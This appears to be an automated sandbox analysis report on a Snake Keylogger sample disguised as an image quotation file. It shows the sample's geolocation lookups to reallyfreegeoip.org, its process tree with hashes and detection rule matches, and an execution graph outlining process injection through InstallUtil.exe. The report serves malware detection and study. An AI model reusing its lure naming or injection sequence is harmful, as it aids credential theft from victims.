                        2024-09-26 07:58:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:38 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        26192.168.2.549759188.114.96.34435780C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        TimestampBytes transferredDirectionData
                        2024-09-26 07:58:41 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                        Host: reallyfreegeoip.org
                        Connection: Keep-Alive
                        2024-09-26 07:58:41 UTC681INHTTP/1.1 200 OK
                        Date: Thu, 26 Sep 2024 07:58:41 GMT
                        Content-Type: application/xml
                        Transfer-Encoding: chunked
                        Connection: close
                        access-control-allow-origin: *
                        vary: Accept-Encoding
                        Cache-Control: max-age=86400
                        CF-Cache-Status: HIT
                        Age: 2353
                        Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lojlq%2BhT%2FOyPzzuFkDeVAoCR1HDtu6bIgCV44hmiB0Wsh%2BFolCFKWWwIXgwSydI1wG%2BbPW7N%2BJjbkupzS2qoLv2y67P%2BtjBHRUglLhMrwf7f07Q00hbFa0RKzGmvCYRqJRrMlrt4"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8c91b5d71de74299-EWR
                        2024-09-26 07:58:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                        2024-09-26 07:58:41 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:03:57:57
                        Start date:26/09/2024
                        Path:C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\RFQ____RM quotation_JPEG IMAGE.img.exe"
                        Imagebase:0xc70000
                        File size:35'328 bytes
                        MD5 hash:C3490999B5E36705B9B2ABB2A3ED08C1
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2089672155.0000000003555000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2089672155.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2111165061.0000000006380000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2105174965.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2105174965.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2105174965.0000000004439000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:2
                        Start time:03:58:00
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Imagebase:0xb10000
                        File size:42'064 bytes
                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4524686788.0000000003043000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4524686788.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        General

                        Target ID:3
                        Start time:03:58:10
                        Start date:26/09/2024
                        Path:C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Gydvapkca.exe"
                        Imagebase:0x210000
                        File size:35'328 bytes
                        MD5 hash:C3490999B5E36705B9B2ABB2A3ED08C1
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2224812433.000000000259A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2248365081.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2248365081.0000000003C8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2224812433.00000000023E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 63%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:5
                        Start time:03:58:14
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Imagebase:0x9b0000
                        File size:42'064 bytes
                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4524242471.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.4518406958.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.4524242471.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        General

                        Target ID:6
                        Start time:03:58:18
                        Start date:26/09/2024
                        Path:C:\Users\user\AppData\Roaming\Gydvapkca.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\Gydvapkca.exe"
                        Imagebase:0x3c0000
                        File size:35'328 bytes
                        MD5 hash:C3490999B5E36705B9B2ABB2A3ED08C1
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.2322264218.0000000003762000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2301023518.0000000002659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2322264218.0000000003EFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.2301023518.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:7
                        Start time:03:58:22
                        Start date:26/09/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Imagebase:0x7ff632ac0000
                        File size:42'064 bytes
                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4525996681.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4525996681.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:false

                        Disassembly

                        Reset < >

                          Execution Graph

                          Execution Coverage:11.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:9.7%
                          Total number of Nodes:207
                          Total number of Limit Nodes:13
                          execution_graph 48854 123d030 48855 123d048 48854->48855 48856 123d0a3 48855->48856 48858 65ce1b8 48855->48858 48859 65ce211 48858->48859 48862 65ce748 48859->48862 48860 65ce246 48863 65ce775 48862->48863 48864 65cd5f0 VirtualProtect 48863->48864 48866 65ce90b 48863->48866 48865 65ce8fc 48864->48865 48865->48860 48866->48860 48896 65cec98 48897 65cecdc VirtualAlloc 48896->48897 48899 65ced49 48897->48899 48900 6546d80 48901 6546d8a 48900->48901 48905 6509810 48901->48905 48910 6509820 48901->48910 48902 6546dc8 48906 6509835 48905->48906 48915 6509989 48906->48915 48920 6509a7f 48906->48920 48907 650984b 48907->48902 48911 6509835 48910->48911 48913 6509989 2 API calls 48911->48913 48914 6509a7f 2 API calls 48911->48914 48912 650984b 48912->48902 48913->48912 48914->48912 48917 65099ad 48915->48917 48916 6509ab9 48916->48907 48917->48916 48918 64f2d08 VirtualProtect 48917->48918 48919 64f2d00 VirtualProtect 48917->48919 48918->48917 48919->48917 48922 6509a85 48920->48922 48921 6509ab9 48921->48907 48922->48921 48923 64f2d08 VirtualProtect 48922->48923 48924 64f2d00 VirtualProtect 48922->48924 48923->48922 48924->48922 48925 65474a1 48926 65474ab 48925->48926 48930 64fc6f8 48926->48930 48935 64fc708 48926->48935 48927 65474e9 48931 64fc71d 48930->48931 48932 64fc733 48931->48932 48940 64fccde 48931->48940 48945 64fca20 48931->48945 48932->48927 48936 64fc71d 48935->48936 48937 64fc733 48936->48937 48938 64fccde 12 API calls 48936->48938 48939 64fca20 12 API calls 48936->48939 48937->48927 48938->48937 48939->48937 48941 64fc7a5 48940->48941 48942 64fcaf2 48940->48942 48941->48932 48950 64fdb30 48942->48950 48956 64fdb40 48942->48956 48947 64fca2f 48945->48947 48946 64fc7a5 48946->48932 48947->48946 48948 64fdb40 12 API calls 48947->48948 48949 64fdb30 12 API calls 48947->48949 48948->48946 48949->48946 48951 64fdb40 48950->48951 48962 64fde8d 48951->48962 48966 64fdb90 48951->48966 48970 64fdb81 48951->48970 48952 64fdb77 48952->48941 48957 64fdb55 48956->48957 48959 64fde8d 12 API calls 48957->48959 48960 64fdb81 12 API calls 48957->48960 48961 64fdb90 12 API calls 48957->48961 48958 64fdb77 48958->48941 48959->48958 48960->48958 48961->48958 48964 64fdbf5 48962->48964 48963 64fdc50 48963->48952 48964->48963 48974 64fe2b9 48964->48974 48968 64fdbbd 48966->48968 48967 64fdc50 48967->48952 48968->48967 48969 64fe2b9 12 API calls 48968->48969 48969->48968 48972 64fdb90 48970->48972 48971 64fdc50 48971->48952 48972->48971 48973 64fe2b9 12 API calls 48972->48973 48973->48972 48975 64fe2dd 48974->48975 48989 64fe9af 48975->48989 48995 64ff240 48975->48995 49001 64fe7e2 48975->49001 49006 64fe895 48975->49006 49011 64febc5 48975->49011 49016 64feb36 48975->49016 49021 64fee68 48975->49021 49026 64fead9 48975->49026 49031 64fed1b 48975->49031 49038 64ff48d 48975->49038 49043 64fedae 48975->49043 49048 64ff12f 48975->49048 49053 64f2108 48989->49053 49058 64f2158 48989->49058 49062 64f2150 48989->49062 49066 64f2118 48989->49066 48990 64fe9c9 48996 64feb3a 48995->48996 48997 64fe393 48995->48997 48998 64fedb8 48996->48998 49070 65b16f0 48996->49070 49075 65b1700 48996->49075 49002 64fe7ff 49001->49002 49088 64f2818 49002->49088 49092 64f2811 49002->49092 49003 64fe84d 49007 64ff155 49006->49007 49008 64fe393 49006->49008 49096 64f2a29 49007->49096 49100 64f2a30 49007->49100 49012 64feb60 49011->49012 49013 64fedb8 49012->49013 49014 65b16f0 2 API calls 49012->49014 49015 65b1700 2 API calls 49012->49015 49014->49012 49015->49012 49017 64feb44 49016->49017 49018 64fedb8 49017->49018 49019 65b16f0 2 API calls 49017->49019 49020 65b1700 2 API calls 49017->49020 49019->49017 49020->49017 49022 64fee80 49021->49022 49024 64f2818 WriteProcessMemory 49022->49024 49025 64f2811 WriteProcessMemory 49022->49025 49023 64fe393 49024->49023 49025->49023 49027 64feaf1 49026->49027 49104 64ff959 49027->49104 49108 64ff968 49027->49108 49028 64feb09 49032 64fefae 49031->49032 49033 64fe393 49031->49033 49034 64f2158 Wow64SetThreadContext 49032->49034 49035 64f2108 Wow64SetThreadContext 49032->49035 49036 64f2118 Wow64SetThreadContext 49032->49036 49037 64f2150 Wow64SetThreadContext 49032->49037 49034->49033 49035->49033 49036->49033 49037->49033 49039 64ff4a5 49038->49039 49041 64f2818 WriteProcessMemory 49039->49041 49042 64f2811 WriteProcessMemory 49039->49042 49040 64fe393 49041->49040 49042->49040 49044 64fedb8 49043->49044 49045 64feb60 49043->49045 49045->49043 49046 65b16f0 2 API calls 49045->49046 49047 65b1700 2 API calls 49045->49047 49046->49045 49047->49045 49049 64ff139 49048->49049 49051 64f2a29 NtResumeThread 49049->49051 49052 64f2a30 NtResumeThread 49049->49052 49050 64fe393 49051->49050 49052->49050 49055 64f20cf 49053->49055 49054 64f20d1 49055->48990 49055->49054 49056 64f21e3 Wow64SetThreadContext 49055->49056 49057 64f2219 49056->49057 49057->48990 49059 64f21a1 Wow64SetThreadContext 49058->49059 49061 64f2219 49059->49061 49061->48990 49063 64f2158 Wow64SetThreadContext 49062->49063 49065 64f2219 49063->49065 49065->48990 49067 64f2124 49066->49067 49067->48990 49068 64f21e3 Wow64SetThreadContext 49067->49068 49069 64f2219 49068->49069 49069->48990 49071 65b1700 49070->49071 49080 64f26b8 49071->49080 49084 64f26b0 49071->49084 49072 65b1737 49072->48996 49076 65b1715 49075->49076 49078 64f26b8 VirtualAllocEx 49076->49078 49079 64f26b0 VirtualAllocEx 49076->49079 49077 65b1737 49077->48996 49078->49077 49079->49077 49081 64f26fc VirtualAllocEx 49080->49081 49083 64f2774 49081->49083 49083->49072 49085 64f26b8 VirtualAllocEx 49084->49085 49087 64f2774 49085->49087 49087->49072 49089 64f2864 WriteProcessMemory 49088->49089 49091 64f28fd 49089->49091 49091->49003 49093 64f2818 WriteProcessMemory 49092->49093 49095 64f28fd 49093->49095 49095->49003 49097 64f2a30 NtResumeThread 49096->49097 49099 64f2ad0 49097->49099 49099->49008 49101 64f2a79 NtResumeThread 49100->49101 49103 64f2ad0 49101->49103 49103->49008 49105 64ff968 49104->49105 49106 64ff9a1 49105->49106 49112 65b00fb 49105->49112 49106->49028 49109 64ff969 49108->49109 49110 64ff9a1 49109->49110 49111 65b00fb 2 API calls 49109->49111 49110->49028 49111->49110 49113 65b0102 49112->49113 49117 64f1d94 49113->49117 49121 64f1da0 49113->49121 49118 64f1da0 CreateProcessA 49117->49118 49120 64f201c 49118->49120 49123 64f1e20 CreateProcessA 49121->49123 49124 64f201c 49123->49124 48892 64f14f8 48893 64f1547 NtProtectVirtualMemory 48892->48893 48895 64f15bf 48893->48895 48825 1418dc8 48826 1418de4 48825->48826 48827 1418df4 48826->48827 48832 65c995c 48826->48832 48835 65c12a4 48826->48835 48839 65c7b9f 48826->48839 48843 65c7c2c 48826->48843 48846 65cd5f0 48832->48846 48836 65c12c3 48835->48836 48838 65cd5f0 VirtualProtect 48836->48838 48837 65c12ea 48838->48837 48840 65c7bbb 48839->48840 48842 65cd5f0 VirtualProtect 48840->48842 48841 65c01e8 48842->48841 48845 65cd5f0 VirtualProtect 48843->48845 48844 65c01e8 48845->48844 48848 65cd617 48846->48848 48850 65cdad0 48848->48850 48851 65cdb19 VirtualProtect 48850->48851 48853 65c9971 48851->48853

                          Executed Functions

                          Function 0654C100 Relevance: 16.2, Strings: 12, Instructions: 1180COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,iq$4$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                          • API String ID: 0-1238709156
                          • Opcode ID: 441db6cc1a718f4f1ebd672d6d5af533174e65ce9ddbd85a2b9d6f99276d7f48
                          • Instruction ID: 7554abca12a1b79fe31790dd190cd8a3be74d0e9d0af4bde0a1c63dfadfff362
                          • Opcode Fuzzy Hash: 441db6cc1a718f4f1ebd672d6d5af533174e65ce9ddbd85a2b9d6f99276d7f48
                          • Instruction Fuzzy Hash: 48B20534A01228DFDB54DFA9C984BADB7B6FF88304F148199E505AB2A5DB71EC81CF50
                          Function 0654C427 Relevance: 8.0, Strings: 6, Instructions: 495COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2112090854.0000000006540000.00000040.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6540000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,iq$4$$eq$$eq$$eq$$eq
                          • API String ID: 0-4077973435
                          • Opcode ID: 644923e64328e2754c6f232ebd09eeee4151145f5abc3946737c9f7b00a49154
                          • Instruction ID: ba05483209ff7b37f5d0627cf8e6bea49e0da45085f349726bf5821577b95bf3
                          • Opcode Fuzzy Hash: 644923e64328e2754c6f232ebd09eeee4151145f5abc3946737c9f7b00a49154
                          • Instruction Fuzzy Hash: 59221A74A01219DFDB64DFA4C984BADB7B2FF88304F1481D9E509AB2A5DB31AD81CF50
                          Function 0141D2D0 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 718 141d2d0-141d2f1 719 141d2f3 718->719 720 141d2f8-141d3df 718->720 719->720 722 141dae1-141db09 720->722 723 141d3e5-141d526 call 1419508 720->723 726 141e20f-141e218 722->726 769 141daaa-141dad4 723->769 770 141d52c-141d587 723->770 728 141db17-141db21 726->728 729 141e21e-141e235 726->729 731 141db23 728->731 732 141db28-141dc1c call 1419508 728->732 731->732 751 141dc46 732->751 752 141dc1e-141dc2a 732->752 756 141dc4c-141dc6c 751->756 754 141dc34-141dc3a 752->754 755 141dc2c-141dc32 752->755 757 141dc44 754->757 755->757 760 141dccc-141dd4c 756->760 761 141dc6e-141dcc7 756->761 757->756 783 141dda3-141dde6 call 1419508 760->783 784 141dd4e-141dda1 760->784 773 141e20c 761->773 780 141dad6 769->780 781 141dade 769->781 777 141d589 770->777 778 141d58c-141d597 770->778 773->726 777->778 782 141d9bf-141d9c5 778->782 780->781 781->722 786 141d9cb-141da47 call 1413378 782->786 787 141d59c-141d5ba 782->787 809 141ddf1-141ddfa 783->809 784->809 829 141da94-141da9a 786->829 789 141d611-141d626 787->789 790 141d5bc-141d5c0 787->790 793 141d628 789->793 794 141d62d-141d643 789->794 790->789 795 141d5c2-141d5cd 790->795 793->794 798 141d645 794->798 799 141d64a-141d661 794->799 800 141d603-141d609 795->800 798->799 805 141d663 799->805 806 141d668-141d67e 799->806 803 141d60b-141d60c 800->803 804 141d5cf-141d5d3 800->804 808 141d68f-141d6fa 803->808 810 141d5d5 804->810 811 141d5d9-141d5f1 804->811 805->806 812 141d680 806->812 813 141d685-141d68c 806->813 814 141d6fc-141d708 808->814 815 141d70e-141d8c3 808->815 817 141de5a-141de69 809->817 810->811 818 141d5f3 811->818 819 141d5f8-141d600 811->819 812->813 813->808 814->815 827 141d8c5-141d8c9 815->827 828 141d927-141d93c 815->828 820 141de6b-141def3 817->820 821 141ddfc-141de24 817->821 818->819 819->800 856 141e06c-141e078 820->856 824 141de26 821->824 825 141de2b-141de54 821->825 824->825 825->817 827->828 834 141d8cb-141d8da 827->834 832 141d943-141d964 828->832 833 141d93e 828->833 830 141da49-141da91 829->830 831 141da9c-141daa2 829->831 830->829 831->769 836 141d966 832->836 837 141d96b-141d98a 832->837 833->832 839 141d919-141d91f 834->839 836->837 840 141d991-141d9b1 837->840 841 141d98c 837->841 843 141d921-141d922 839->843 844 141d8dc-141d8e0 839->844 850 141d9b3 840->850 851 141d9b8 840->851 841->840 846 141d9bc 843->846 848 141d8e2-141d8e6 844->848 849 141d8ea-141d90b 844->849 846->782 848->849 852 141d912-141d916 849->852 853 141d90d 849->853 850->851 851->846 852->839 853->852 858 141def8-141df01 856->858 859 141e07e-141e0d9 856->859 860 141df03 858->860 861 141df0a-141e060 858->861 874 141e110-141e13a 859->874 875 141e0db-141e10e 859->875 860->861 863 141df10-141df50 860->863 864 141df55-141df95 860->864 865 141df9a-141dfda 860->865 866 141dfdf-141e01f 860->866 878 141e066 861->878 863->878 864->878 865->878 866->878 883 141e143-141e1d6 874->883 875->883 878->856 887 141e1dd-141e1fd 883->887 887->773
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2087204893.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1410000_RFQ____RM quotation_JPEG IMAGE.jbxd
                          Similarity
                          • API ID:
                          • String ID: TJjq$Teeq$piq$xbhq
                          • API String ID: 0-2649575939
                          • Opcode ID: 17b26753d4421c353e0825bfaf234ae0ec5b83048155294e1c8210a3dc05366c
                          • Instruction ID: 9d40863f5bdf037cd0b375fc7de0d4d62b35957e2c79e5197ccb8eefc04835e9
